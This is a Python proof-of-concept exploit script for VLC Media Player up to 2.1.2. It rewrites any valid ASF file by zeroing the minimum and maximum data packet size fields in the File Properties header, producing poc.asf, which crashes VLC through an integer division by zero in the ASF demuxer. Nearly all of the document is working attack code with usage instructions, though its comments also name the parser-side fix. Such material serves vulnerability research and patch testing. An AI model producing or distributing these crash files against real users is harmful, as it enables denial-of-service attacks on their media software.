#!/usr/bin/python
# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer
# VLC Media Player is prone to a denial of service caused by a division-by-zero error in the ASF demuxer
# when the minimum data packet size is equal to zero. This was tested on Windows XP SP3 and affects all versions of VLC up to the latest, 2.1.2.
# To run this script you need to install the Python bitstring module.
# Usage: supply any valid ASF file and the script will produce a POC ASF file that will crash VLC.
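import sys

from bitstring import BitArray

# GUID that opens the ASF File Properties Object, as the bytes appear in the file.
FILE_PROPERTIES_GUID = '0xa1dcab8c47a9cf118ee400c00c205365'
# Bit offset from the start of that GUID to the Minimum Data Packet Size field
# (736 bits = 92 bytes). The Maximum Data Packet Size field is the 32 bits
# that follow it.
MIN_DATA_PKT_SIZE_OFFSET = 736

# The input file is only read, so it is opened read-only. Everything that
# touches the bit array stays inside this block so the source file remains
# open until the output has been written.
with open(sys.argv[1], 'rb') as f:
    f.seek(0, 2)  # whence=2: jump to end of file to measure its length
    size = f.tell()
    print("[*] file size: %d" % size)
    f.seek(0, 0)
    print("[*] ReeeeeWWWWWWiiiiiNNNNNNND")

    fb = BitArray(f)
    index = fb.find(FILE_PROPERTIES_GUID, bytealigned=True)
    # find() returns an empty tuple when there is no match; without this check
    # the script would report success and then fail on index[0].
    if not index:
        print("[-] File Properties GUID not found; input is not a valid ASF file")
        sys.exit(1)
    print("[*] found file properties GUID")
    print("[*] File properties GUID: %s" % fb[index[0]:(index[0] + 128)])

    # Position of the Minimum Data Packet Size field in the File Properties header.
    i_min_data_pkt_size = index[0] + MIN_DATA_PKT_SIZE_OFFSET
    # A truncated header would make the slices below run past the end of the data.
    if i_min_data_pkt_size + 64 > len(fb):
        print("[-] File Properties header is truncated; nothing to modify")
        sys.exit(1)

    print("[*] Original Minimum Data Packet Size: %s"
          % fb[i_min_data_pkt_size:i_min_data_pkt_size + 32].hex)
    print("[*] Original Maximum Data Packet Size: %s"
          % fb[i_min_data_pkt_size + 32:i_min_data_pkt_size + 64].hex)

    # According to the ASF standard the minimum and maximum data packet sizes
    # should be equal, so both 32-bit fields are cleared together. A demuxer
    # that divides by the minimum packet size without first rejecting zero
    # hits the integer division by zero described in the header comment; the
    # parser-side fix is to validate this field before using it as a divisor.
    print("[*] Changing Miniumum and Maximum Data packet size to 0")
    # Clear the eight bytes (two 32-bit fields) one byte at a time.
    for bit_offset in range(0, 64, 8):
        start = i_min_data_pkt_size + bit_offset
        fb[start:start + 8] = 0x00

    with open('poc.asf', 'w+b') as of:
        fb.tofile(of)
    # Report success only after the output file has actually been written.
    print("[*] POC File Created poc.asf")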